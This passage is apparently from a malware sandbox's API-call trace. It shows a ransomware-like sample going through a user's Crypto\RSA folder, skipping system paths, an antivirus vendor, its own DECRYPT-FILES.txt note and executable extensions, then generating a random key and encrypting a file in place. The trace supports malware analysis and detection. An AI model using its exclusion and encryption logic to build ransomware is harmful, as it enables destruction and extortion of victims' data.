returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\" [0180.469] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\0a16c9.tmp" [0180.469] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.469] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.469] CloseHandle (hObject=0x0) returned 0 [0180.469] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.470] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa53cfc0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa53cfc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa53cfc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0180.470] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0180.470] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x681f1360, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0xaa621800, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa621800, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000", cAlternateFileName="S-1-5-~1")) returned 1 [0180.470] lstrcmpW (lpString1="S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2=".") returned 1 [0180.470] lstrcmpW (lpString1="S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2="..") returned 1 [0180.470] lstrcatW (in: lpString1="S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2="\\" | out: lpString1="S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned="S-1-5-21-3388679973-3930757225-3770151564-1000\\" [0180.470] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpString2="S-1-5-21-3388679973-3930757225-3770151564-1000\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\" [0180.470] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="\\Program Files") returned 0x0 [0180.470] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch=":\\Windows") returned 0x0 [0180.470] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="\\Games\\") returned 0x0 [0180.470] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="\\Tor Browser\\") returned 0x0 [0180.470] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="\\ProgramData\\") returned 0x0 [0180.470] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0180.470] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0180.470] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0180.470] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="\\All Users") returned 0x0 [0180.470] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="\\IETldCache\\") returned 0x0 [0180.470] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="\\Local Settings\\") returned 0x0 [0180.470] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="\\AppData\\Local") returned 0x0 [0180.470] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="AhnLab") returned 0x0 [0180.470] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0180.470] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned 114 [0180.470] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.470] wsprintfW (in: param_1=0x36fe07c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\\\0a16c9.tmp") returned 125 [0180.470] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x27c [0180.474] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned 114 [0180.474] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0180.474] wsprintfW (in: param_1=0x36fe07c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\\\DECRYPT-FILES.txt") returned 132 [0180.474] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.478] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned 114 [0180.478] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*" [0180.478] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*", lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x681f1360, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0xeeb26fa0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeeb26fa0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4799b8 [0180.478] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.478] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x681f1360, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0xeeb26fa0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeeb26fa0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.479] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0180.479] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.479] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeeb26fa0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xeeb26fa0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeeb26fa0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0180.479] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0180.479] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0180.479] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0180.479] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0180.479] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0180.479] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0180.479] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0180.479] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0180.479] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0180.479] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0180.479] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.479] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0180.479] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0180.479] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0180.479] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0180.479] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned 114 [0180.479] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.479] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\" [0180.479] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\0a16c9.tmp" [0180.479] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.479] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.480] CloseHandle (hObject=0x0) returned 0 [0180.480] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.480] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xa1e34990, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1e34990, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xaa589280, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x135, dwReserved0=0x0, dwReserved1=0x0, cFileName="83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.H3nJ", cAlternateFileName="83AA4C~1.H3N")) returned 1 [0180.480] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.H3nJ", lpString2="DECRYPT-FILES.txt") returned -1 [0180.480] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.H3nJ", lpString2="autorun.inf") returned -1 [0180.480] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.H3nJ", lpString2="boot.ini") returned -1 [0180.480] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.H3nJ", lpString2="desktop.ini") returned -1 [0180.480] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.H3nJ", lpString2="ntuser.dat") returned -1 [0180.480] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.H3nJ", lpString2="iconcache.db") returned -1 [0180.480] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.H3nJ", lpString2="bootsect.bak") returned -1 [0180.480] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.H3nJ", lpString2="ntuser.dat.log") returned -1 [0180.480] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.H3nJ", lpString2="thumbs.db") returned -1 [0180.480] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.H3nJ", lpString2="Bootfont.bin") returned -1 [0180.480] lstrlenW (lpString="83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.H3nJ") returned 74 [0180.480] lstrcmpiW (lpString1="H3nJ", lpString2="lnk") returned -1 [0180.480] lstrcmpiW (lpString1="H3nJ", lpString2="exe") returned 1 [0180.480] lstrcmpiW (lpString1="H3nJ", lpString2="sys") returned -1 [0180.480] lstrcmpiW (lpString1="H3nJ", lpString2="dll") returned 1 [0180.480] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned 114 [0180.480] lstrlenW (lpString="83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.H3nJ") returned 74 [0180.480] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\" [0180.480] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpString2="83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.H3nJ" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.H3nJ") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.H3nJ" [0180.480] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.481] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.H3nJ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.h3nj"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x284 [0180.481] GetFileSizeEx (in: hFile=0x284, lpFileSize=0x36fd838 | out: lpFileSize=0x36fd838*=309) returned 1 [0180.481] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0180.482] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0180.482] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x20, pbBuffer=0x750000 | out: pbBuffer=0x750000) returned 1 [0180.482] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x8, pbBuffer=0x750020 | out: pbBuffer=0x750020) returned 1 [0180.482] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0180.482] CryptEncrypt (in: hKey=0x479638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8b0000*, pdwDataLen=0x36fd7a0*=0x28, dwBufLen=0x100 | out: pbData=0x8b0000*, pdwDataLen=0x36fd7a0*=0x100) returned 1 [0180.483] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x8c0000 [0180.483] VirtualFree (lpAddress=0x8c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.483] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0180.484] CloseHandle (hObject=0x288) returned 1 [0180.484] SetFilePointerEx (in: hFile=0x284, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.484] WriteFile (in: hFile=0x284, lpBuffer=0x8b0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x36fd7c0, lpOverlapped=0x0 | out: lpBuffer=0x8b0000*, lpNumberOfBytesWritten=0x36fd7c0*=0x108, lpOverlapped=0x0) returned 1 [0180.485] CloseHandle (hObject=0x0) returned 0 [0180.485] CloseHandle (hObject=0x284) returned 1 [0180.485] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.486] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.486] GetTickCount () returned 0x1134902 [0180.486] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.486] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0180.486] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x8a0000 [0180.486] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0180.487] lstrlenA (lpString="kernel32.dll") returned 12 [0180.487] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0180.487] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0180.487] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0180.487] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0180.487] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0180.487] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0180.487] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0180.487] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0180.487] lstrlenA (lpString="ADDATOMA") returned 8 [0180.487] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0180.487] lstrlenA (lpString="ADDATOMW") returned 8 [0180.487] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0180.487] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0180.487] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0180.487] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0180.487] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0180.487] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0180.487] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0180.487] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0180.487] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0180.487] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0180.487] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0180.487] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0180.487] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0180.487] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0180.487] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0180.487] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0180.487] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0180.487] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0180.487] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0180.488] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0180.488] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0180.488] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0180.488] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0180.488] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0180.488] lstrcpyA (in: lpString1=0x36fcbb4, 